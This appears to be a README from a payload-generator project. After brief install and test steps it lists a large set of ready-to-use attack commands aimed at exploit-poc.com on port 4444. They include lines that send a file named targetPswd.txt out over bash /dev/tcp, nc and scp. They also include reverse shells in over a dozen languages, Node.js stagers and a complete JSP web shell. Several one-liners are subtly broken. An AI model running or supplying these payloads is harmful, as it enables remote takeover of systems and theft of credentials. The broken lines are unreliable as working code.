# install brew: https://docs.brew.sh/Installation
$ /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)"


# install openssl
$ brew install openssl

# install npm mod
$ npm install

# merge md
$ cat README1.md testInfo.md >README.md

$ node test.js

Host: exploit-poc.com
port:4444
fileName:targetPswd.txt
test str:{"k":"=this is test&","xx":"=999"}

    bash -c 'echo -e "POST / HTTP/0.9

$(<targetPswd.txt)" > /dev/tcp/exploit-poc.com/4444'
    

 
    bash -c 'cat targetPswd.txt > /dev/tcp/exploit-poc.com/4444'
    

bash -c 'cat < /dev/tcp/exploit-poc.com/4444 > targetPswd.txt'

nc exploit-poc.com 4444 < targetPswd.txt

python3 -m http.server 4444

python -m SimpleHTTPServer 4444

scp targetPswd.txt [email protected]:~/destination -P 4444

scp [email protected]:~/path_to_file file_saved -P 4444

bash -c 'exec bash -i &>/dev/tcp/exploit-poc.com/4444 <&1'

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc exploit-poc.com 4444 >/tmp/f

php -r '$sock=fsockopen(getenv("exploit-poc.com"),getenv("4444"));exec("/bin/sh -i <&3 >&3 2>&3");'

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('exploit-poc.com',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

perl -e 'use Socket;$i="$ENV{exploit-poc.com}";$p=$ENV{4444};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

python -c 'import sys,socket,os,pty;s=socket.socket()s.connect((os.getenv("exploit-poc.com"),int(os.getenv("4444"))))[os.dup2(s.fileno(),fd) for fd in (0,1,2)]pty.spawn("/bin/sh")'

ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["exploit-poc.com"],ENV["4444"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

TF=$(mktemp -u); mkfifo $TF && telnet exploit-poc.com 4444 0<$TF | /bin sh 1>$TF

zsh -c 'zmodload zsh/net/tcp && ztcp exploit-poc.com 4444 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'

s<-socketConnection(host='exploit-poc.com',port=4444,blocking=TRUE,server=FALSE,open='r+');while(TRUE){writeLines(readLines(pipe(readLines(s, 1))),s)}

lua -e "local s=require('socket');local t=assert(s.tcp());t:connect('exploit-poc.com',4444);while true do local r,x=t:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));t:send(b);end;f:close();t:close();"

(function(){ var require = global.require || global.process.mainModule.constructor._load; if (!require) return; var cmd = (global.process.platform.match(/^win/i)) ? "cmd" : "/bin/sh"; var net = require("net"), cp = require("child_process"), util = require("util"), sh = cp.spawn(cmd, []); var client = this; var counter=0; function StagerRepeat(){ client.socket = net.connect(4444, "exploit-poc.com", function() { client.socket.pipe(sh.stdin); if (typeof util.pump === "undefined") { sh.stdout.pipe(client.socket); sh.stderr.pipe(client.socket); } else { util.pump(sh.stdout, client.socket); util.pump(sh.stderr, client.socket); } }); socket.on("error", function(error) { counter++; if(counter<= 10){ setTimeout(function() { StagerRepeat();}, 5*1000); } else process.exit(); }); } StagerRepeat(); })();

(function(){ var require = global.require || global.process.mainModule.constructor._load; if (!require) return; var cmd = (global.process.platform.match(/^win/i)) ? "cmd" : "/bin/sh"; var net = require("tls"), cp = require("child_process"), util = require("util"), sh = cp.spawn(cmd, []); var client = this; var counter=0; function StagerRepeat(){ client.socket = net.connect(4444, "exploit-poc.com", {rejectUnauthorized:false}, function() { client.socket.pipe(sh.stdin); if (typeof util.pump === "undefined") { sh.stdout.pipe(client.socket); sh.stderr.pipe(client.socket); } else { util.pump(sh.stdout, client.socket); util.pump(sh.stderr, client.socket); } }); socket.on("error", function(error) { counter++; if(counter<= 10){ setTimeout(function() { StagerRepeat();}, 5*1000); } else process.exit(); }); } StagerRepeat(); })();

awk 'BEGIN{s="/inet/tcp/0/exploit-poc.com/4444";do{if((s|&getline c)<=0)break;if(c){while((c|&getline)>0)print $0|&s;close(c)}} while(c!="exit")close(s)}'

<%@page import="java.lang.*"%>
	<%@page import="java.util.*"%>
	<%@page import="java.io.*"%>
	<%@page import="java.net.*"%>
	
	<%
	  class StreamConnector extends Thread
	  {
		InputStream zP;
		OutputStream l7;
	
		StreamConnector( InputStream zP, OutputStream l7 )
		{
		  this.zP = zP;
		  this.l7 = l7;
		}
	
		public void run()
		{
		  BufferedReader tC  = null;
		  BufferedWriter uYY = null;
		  try
		  {
			tC  = new BufferedReader( new InputStreamReader( this.zP ) );
			uYY = new BufferedWriter( new OutputStreamWriter( this.l7 ) );
			char buffer[] = new char[8192];
			int length;
			while( ( length = tC.read( buffer, 0, buffer.length ) ) > 0 )
			{
			  uYY.write( buffer, 0, length );
			  uYY.flush();
			}
		  } catch( Exception e ){}
		  try
		  {
			if( tC != null )
			  tC.close();
			if( uYY != null )
			  uYY.close();
		  } catch( Exception e ){}
		}
	  }
	
	  try
	  {
		String ShellPath;
	if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
	  ShellPath = new String("/bin/sh");
	} else {
	  ShellPath = new String("cmd.exe");
	}
	
		Socket socket = new Socket( "exploit-poc.com", 4444 );
		Process process = Runtime.getRuntime().exec( ShellPath );
		( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
		( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
	  } catch( Exception e ) {}
	%>